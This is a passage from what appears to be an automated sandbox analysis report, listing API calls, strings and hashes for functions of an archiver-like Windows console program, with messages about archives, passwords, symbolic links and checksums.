Part of subcall function 009D5A99: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000001,?,?,00000000), ref: 009D5AC0

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Strings

.tmp, xrefs: 009D62C8
d, xrefs: 009D6347

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: CountCurrentErrorH_prologLastTick$CreateDirectoryProcessThreadfree
String ID: .tmp$d
API String ID: 1989517917-2797371523
Opcode ID: b248e44a979a315427e0d5ff580bc5eb3e94c7db40bb8d0fc217c2264e91e8e5
Instruction ID: 2d5699504cfd317479f7c98020ce13656f34b140a9bb3e2a16f30f32cb628468
Opcode Fuzzy Hash: b248e44a979a315427e0d5ff580bc5eb3e94c7db40bb8d0fc217c2264e91e8e5
Instruction Fuzzy Hash: 7541F336990215DBDF149FA4D8457EEBB75FF95314F14822BE412B73A1CB394801CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A0AA48 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

Part of subcall function 009D1FE9: fputc.MSVCRT ref: 009D1FF0

fputs.MSVCRT ref: 00A0AA68
fputs.MSVCRT ref: 00A0AA71
__aulldiv.LIBCMT ref: 00A0AA83

Part of subcall function 00A0A9F8: fputs.MSVCRT ref: 00A0AA39

fputc.MSVCRT ref: 00A0AAA7
__aulldiv.LIBCMT ref: 00A0AB30
fputs.MSVCRT ref: 00A0AB46
fputc.MSVCRT ref: 00A0AB61

Strings

Time =, xrefs: 00A0AA6C
Kernel , xrefs: 00A0AA4B, 00A0AA4C, 00A0AA61

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$fputc$__aulldiv
String ID: Time =$Kernel
API String ID: 3602660170-1750218609
Opcode ID: b96e7fbf2bd3f4abd78ce33265952daf92566826e4d484c6f12540ca11464dce
Instruction ID: 42d306e88baecae5b64b8996b72af3fe38fe4d2bdc4841d6e875172fb2561dab
Opcode Fuzzy Hash: b96e7fbf2bd3f4abd78ce33265952daf92566826e4d484c6f12540ca11464dce
Instruction Fuzzy Hash: F731C332600308BFEB11EF98ED42F9E77A5EF88750F118416F9089F2D0D671AD518B95

Uniqueness

Uniqueness Score: -1.00%

Function 00A2ADA0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 84libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00A5A8F8), ref: 00A2ADBA

Part of subcall function 00A3EF30: memcpy.MSVCRT ref: 00A3EF5F

GetCurrentThreadId.KERNEL32 ref: 00A2ADD3

Part of subcall function 00A3EF30: memcpy.MSVCRT ref: 00A3EF7B
Part of subcall function 00A3EF30: memcpy.MSVCRT ref: 00A3EFB0

LoadLibraryW.KERNEL32(advapi32.dll,00000004,?,00A5A8F8), ref: 00A2ADF1
GetProcAddress.KERNEL32(00000000,SystemFunction036), ref: 00A2AE03
FreeLibrary.KERNEL32(00000000,?,00A5A8F8), ref: 00A2AE35
QueryPerformanceCounter.KERNEL32(?,?,00A5A8F8), ref: 00A2AE46
GetTickCount.KERNEL32 ref: 00A2AE5F

Strings

advapi32.dll, xrefs: 00A2ADEC
SystemFunction036, xrefs: 00A2ADFD

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: memcpy$CurrentLibrary$AddressCountCounterFreeLoadPerformanceProcProcessQueryThreadTick
String ID: SystemFunction036$advapi32.dll
API String ID: 3940253874-1354007664
Opcode ID: c21922860d57d254273e472e5843e64e71747a665bb44fcb2034f6a8fc3df8e3
Instruction ID: 7aa0b309e0d6c02e516cae1d1dff6a8d4dc13db311a3a468fe06c7da31d08d3d
Opcode Fuzzy Hash: c21922860d57d254273e472e5843e64e71747a665bb44fcb2034f6a8fc3df8e3
Instruction Fuzzy Hash: 0531BC342143129BD714EB60E945BABB3A4BFD4704F004E28F681561D5EA759A0ECBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00A0AB6C Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A0AB71
fputs.MSVCRT ref: 00A0AB91
fputs.MSVCRT ref: 00A0AB96
fputs.MSVCRT ref: 00A0AB9F

Part of subcall function 00A0A9F8: fputs.MSVCRT ref: 00A0AA39

fputs.MSVCRT ref: 00A0ABD4
fputs.MSVCRT ref: 00A0ABFA

Strings

, xrefs: 00A0AB8C
Memory =, xrefs: 00A0AB9A
MB, xrefs: 00A0ABCF

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$H_prolog
String ID: $ MB$ Memory =
API String ID: 2614055831-2616823926
Opcode ID: f62893cbbc4e93bfe6069de6cc7264fc4554c76fee0704f853ff3aadc886c0ba
Instruction ID: 258513cee8dec3d74dd8fa569d20db126fd2ecc382ebc40d559a79843740e629
Opcode Fuzzy Hash: f62893cbbc4e93bfe6069de6cc7264fc4554c76fee0704f853ff3aadc886c0ba
Instruction Fuzzy Hash: 4F11E372E00309AFD705EBD8EC82E6EBB75FFD4310F104127F600962E0DA7668518B52

Uniqueness

Uniqueness Score: -1.00%

Function 00A073F5 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 37COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00A0741B
fputs.MSVCRT ref: 00A07420
fputs.MSVCRT ref: 00A07429
fputs.MSVCRT ref: 00A0743F

Strings

: Cannot open the file as [, xrefs: 00A07424
Open , xrefs: 00A07416
ERROR, xrefs: 00A07407, 00A0741F
] archive, xrefs: 00A0743A
WARNING, xrefs: 00A07400

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs
String ID: : Cannot open the file as [$ERROR$Open $WARNING$] archive
API String ID: 1795875747-657955069
Opcode ID: 5152145b75ad5c57ac109d11ee045ce59642dfa0abeadbd5561842801f8eb20b
Instruction ID: 217cef7aa3450b07e6b1231a1a0a016b9a503a148aded18b220c1bd63f359fc6
Opcode Fuzzy Hash: 5152145b75ad5c57ac109d11ee045ce59642dfa0abeadbd5561842801f8eb20b
Instruction Fuzzy Hash: DFF0273A6052187BC61163996C81D2FBF5AEFC93B0B100017F90843282EF321C208FB0

Uniqueness

Uniqueness Score: -1.00%

Function 009FDAE7 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 168COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009FDAEC

Part of subcall function 009E4152: __EH_prolog.LIBCMT ref: 009E4157

Part of subcall function 009D7F5C: __EH_prolog.LIBCMT ref: 009D7F61

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Strings

REPARSE:, xrefs: 009FDC29
..., xrefs: 009FDCC9
Link: , xrefs: 009FDBA3
WSL: , xrefs: 009FDB31
Junction: , xrefs: 009FDB6D
: , xrefs: 009FDBBB
: MINOR_ERROR, xrefs: 009FDBDC

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$free
String ID: : $ : MINOR_ERROR$...$Junction: $Link: $REPARSE:$WSL:
API String ID: 2654054672-3981964144
Opcode ID: 90c770bfa06e2edb8b31804d1ededfe2c9281eb5b8c6728bf48f1c95906dfe07
Instruction ID: f12024bd444ae1e6026f53e6360fc7e92063c304e9026b07a2eb9456e757fe1e
Opcode Fuzzy Hash: 90c770bfa06e2edb8b31804d1ededfe2c9281eb5b8c6728bf48f1c95906dfe07
Instruction Fuzzy Hash: 0B512571A56149AACF00EF94C851BFDBB7ABFD4302F04840BE942AB381DB748A41C762

Uniqueness

Uniqueness Score: -1.00%

Function 009E5857 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 214COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E585C

Part of subcall function 009E3A8B: __EH_prolog.LIBCMT ref: 009E3A90

Part of subcall function 009D7B17: __EH_prolog.LIBCMT ref: 009D7B1C

Strings

Cannot fill link data, xrefs: 009E5A17
Empty link, xrefs: 009E591A
Dangerous link path was ignored, xrefs: 009E58DE
Internal error for symbolic link file, xrefs: 009E5A4C
Dangerous symbolic link path was ignored, xrefs: 009E59C4
Incorrect path, xrefs: 009E593F

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID: Cannot fill link data$Dangerous link path was ignored$Dangerous symbolic link path was ignored$Empty link$Incorrect path$Internal error for symbolic link file
API String ID: 3519838083-3151419218
Opcode ID: 0c0df0c75cf3efebe2fa873180b5b9674034b0f9ab56e8cbc54098c2ea1e6432
Instruction ID: 1b460a1ae24d9b2874b5a949e77c62fd789d7d717c483566c0520636d79d4664
Opcode Fuzzy Hash: 0c0df0c75cf3efebe2fa873180b5b9674034b0f9ab56e8cbc54098c2ea1e6432
Instruction Fuzzy Hash: DA71E275940289FFCF12EBA1D891AEEBB79BF98314F10C52AF85563252DB305D08CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A01F85 Relevance: 11.4, APIs: 9, Instructions: 116COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00A01F9E
memcmp.MSVCRT ref: 00A01FBB
memcmp.MSVCRT ref: 00A01FCE

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 8359da8b50fbefb70cb07a9899c704a0ecd0e606e2257153733d06be5b36c40a
Instruction ID: ff94019f36e18ed564311ccb81e748f209ce93c2494c0d1b3d927a9765317947
Opcode Fuzzy Hash: 8359da8b50fbefb70cb07a9899c704a0ecd0e606e2257153733d06be5b36c40a
Instruction Fuzzy Hash: 873182B1B403097FD7149E24ED82FBA73ACAA90794F014529FD0B9B286F761EE00C790

Uniqueness

Uniqueness Score: -1.00%

Function 009F3951 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 278COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009F3956

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Strings

-----, xrefs: 009F3B27
cksum, xrefs: 009F3AA6
-----BEGIN PGP SIGNED MESSAGE, xrefs: 009F3B42
Hash: , xrefs: 009F3AD4, 009F3B7B, 009F3B88

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prologfree
String ID: -----$-----BEGIN PGP SIGNED MESSAGE$Hash: $cksum
API String ID: 1978129608-4104380264
Opcode ID: 834cc3ab322d33afd13074591fc8a41eef84a32903034c479acc18b10c9d9790
Instruction ID: 516cc26255e1806c77c9b7fcf990ee6e9e30a787df4a18c989e59a5027d3e31b
Opcode Fuzzy Hash: 834cc3ab322d33afd13074591fc8a41eef84a32903034c479acc18b10c9d9790
Instruction Fuzzy Hash: B0B19F3190428DEECF11DFA4C491BFDBBB4AF55304F14849DEA8667282C7799B49CB21

Uniqueness

Uniqueness Score: -1.00%

Function 009E1FFB Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 183COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E2000

Part of subcall function 009F0B3C: __EH_prolog.LIBCMT ref: 009F0B41

_CxxThrowException.MSVCRT(?,00A51428), ref: 009E21E1
_CxxThrowException.MSVCRT(?,00A51428), ref: 009E21FE
__EH_prolog.LIBCMT ref: 009E2208

Strings

zero size last volume is not allowed, xrefs: 009E21E8
Incorrect volume size:, xrefs: 009E21CE

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$ExceptionThrow
String ID: Incorrect volume size:$zero size last volume is not allowed
API String ID: 2366012087-998621408
Opcode ID: ba575b4caf940338d039a82474ba30d1f81b08545c3e26e769dedd9024335b85
Instruction ID: a1ce3be8cfa374835fcb8b9d0defbbcaf960ca93ef8277ae09597d238b5bb57e
Opcode Fuzzy Hash: ba575b4caf940338d039a82474ba30d1f81b08545c3e26e769dedd9024335b85
Instruction Fuzzy Hash: 4D71D235904289DFCB19EF64C445BEDB7F9BF54300F1484A9E9456B392CB70AE48CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009D1265 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 137COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009D126A

Strings

Incorrect switch postfix:, xrefs: 009D1379
Multiple instances for switch:, xrefs: 009D131B
Too short switch:, xrefs: 009D1339
Too long switch:, xrefs: 009D13D2
Unknown switch:, xrefs: 009D12F0

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID: Incorrect switch postfix:$Multiple instances for switch:$Too long switch:$Too short switch:$Unknown switch:
API String ID: 3519838083-2104980125
Opcode ID: f32b525a72870dd2fcbfa31242b9b67531e3d49a216b2fb1b1a854871bef10bc
Instruction ID: 78e0c067d14194130c270c0ad0f26cb50369c8b4cb7b197c6beece4616b7a212
Opcode Fuzzy Hash: f32b525a72870dd2fcbfa31242b9b67531e3d49a216b2fb1b1a854871bef10bc
Instruction Fuzzy Hash: 4551CD32A4024AEBCF14DF58C580AAEBBB6FF91314F14C55BE4159B782D771EA41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00A06089 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 96COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A0608E

Part of subcall function 00A0B618: fputs.MSVCRT ref: 00A0B681

Strings

Folders, xrefs: 00A06138
Alternate streams size, xrefs: 00A0618A
Files, xrefs: 00A0614C
Alternate streams, xrefs: 00A06176
Size, xrefs: 00A0615E

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prologfputs
String ID: Alternate streams$Alternate streams size$Files$Folders$Size
API String ID: 1798449854-232602582
Opcode ID: 35c3d830981e6d6a8a24da51b651d8cf4679ac7bdc8a09c7ce408f10f963b474
Instruction ID: 88d887138bc33af085c929ca020ca62e29af17735f644f56e7cf6a1a45117609
Opcode Fuzzy Hash: 35c3d830981e6d6a8a24da51b651d8cf4679ac7bdc8a09c7ce408f10f963b474
Instruction Fuzzy Hash: E7319235740704BFDB38AB61D942B6AB7EABF84314F00861EF056536D1CB70A965CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A04700 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00A5A878), ref: 00A0470B
fputs.MSVCRT ref: 00A0474A
fputs.MSVCRT ref: 00A0476F
LeaveCriticalSection.KERNEL32(00A5A878), ref: 00A0480B

Strings

with the file from archive:, xrefs: 00A0476A
Would you like to replace the existing file:, xrefs: 00A04745

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: CriticalSectionfputs$EnterLeave
String ID: Would you like to replace the existing file:$with the file from archive:
API String ID: 3346953513-686978020
Opcode ID: 72f6b7ffe206bd7ff45536a56fb32d0751d6e077433d9339a092920f3a98a8a0
Instruction ID: a348670fb9bfd9229e79e022665db208242af2bc23b7d8d63e5c2894495e8c49
Opcode Fuzzy Hash: 72f6b7ffe206bd7ff45536a56fb32d0751d6e077433d9339a092920f3a98a8a0
Instruction Fuzzy Hash: C331AEB9200208DBDB01EF64EC40BAA77E5FF8E310F128559FA1A57290CB31AC55CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00A05030 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A05035
fputs.MSVCRT ref: 00A0504E

Strings

WARNING:, xrefs: 00A05049
The file is open, xrefs: 00A050C9
Cannot open the file, xrefs: 00A050A4
The archive is open with offset, xrefs: 00A05083

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prologfputs
String ID: Cannot open the file$The archive is open with offset$The file is open$WARNING:
API String ID: 1798449854-1259944392
Opcode ID: 41ba44266ff5af58d941f26fb0e8b173f385ee5759f7e8046c4d7ac2f8c9e82c
Instruction ID: c92b6a6078af302665f259620704db0a71f80b420f06212e1dbaf9e78b738dc5
Opcode Fuzzy Hash: 41ba44266ff5af58d941f26fb0e8b173f385ee5759f7e8046c4d7ac2f8c9e82c
Instruction Fuzzy Hash: 3821C235A01A05AFCB04EF68E452AAEB7B4FF98310F00952AF50697791DB70EC468F81

Uniqueness

Uniqueness Score: -1.00%

Function 00A0CCBC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00A0CCD7

Part of subcall function 009D1FDA: fflush.MSVCRT ref: 009D1FDC

GetStdHandle.KERNEL32(000000F6), ref: 00A0CCE9
GetConsoleMode.KERNEL32(00000000,00000000), ref: 00A0CD0B
SetConsoleMode.KERNEL32(00000000,00000000), ref: 00A0CD1C
SetConsoleMode.KERNEL32(00000000,00000000), ref: 00A0CD3C

Strings

Enter password (will not be echoed):, xrefs: 00A0CCD2

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ConsoleMode$Handlefflushfputs
String ID: Enter password (will not be echoed):
API String ID: 108775803-3720017889
Opcode ID: 13a9c3277cbe9c521cd5bdcf861204ad0522eb5a3491ae56b4dda27a38723eaf
Instruction ID: d419901c7e9220916bd8c72dff6ffd3487bd1a88604effd3bc0e0fe8bd2e15f2
Opcode Fuzzy Hash: 13a9c3277cbe9c521cd5bdcf861204ad0522eb5a3491ae56b4dda27a38723eaf
Instruction Fuzzy Hash: 8411E73690411DBBCB119BA8EC01AEEBFB8EFD1730F044256E810632D0DB314916CB54

Uniqueness

Uniqueness Score: -1.00%

Function 009F4B97 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009F4B9C

Strings

md5, xrefs: 009F4BC5
sha1, xrefs: 009F4BB9
sha256, xrefs: 009F4BAD
crc64, xrefs: 009F4BD1, 009F4BE3, 009F4C0E
crc32, xrefs: 009F4BDD

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID: crc32$crc64$md5$sha1$sha256
API String ID: 3519838083-3826973078
Opcode ID: 3000f4f0ed0e29f2074bd505cb0dc5c03796cdada648e1f67296c8fc9b61c31f
Instruction ID: a139cebe7db0fe162fa33835b39a4b186f4fbf08bcbd9dc9e60ed42773b347bc
Opcode Fuzzy Hash: 3000f4f0ed0e29f2074bd505cb0dc5c03796cdada648e1f67296c8fc9b61c31f
Instruction Fuzzy Hash: 3C110877E8511C97CF14A694A9417FE7379DBE5326F388277E60273382CA384E4483A2

Uniqueness

Uniqueness Score: -1.00%

Function 009D66E8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 009D6701
GetProcAddress.KERNEL32(00000000,FindFirstStreamW), ref: 009D6715
GetProcAddress.KERNEL32(00000000,FindNextStreamW), ref: 009D6722

Strings

FindFirstStreamW, xrefs: 009D670F
FindNextStreamW, xrefs: 009D6717
kernel32.dll, xrefs: 009D66FC

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
API String ID: 667068680-4044117955
Opcode ID: b057ee51dcd5607ac98d1341786f2a37433b1b22df7b31068b1c91dd7c1c68df
Instruction ID: 8d8f8a3294f330f2842616364389106c86d2316f70470c3dd54505597835d475
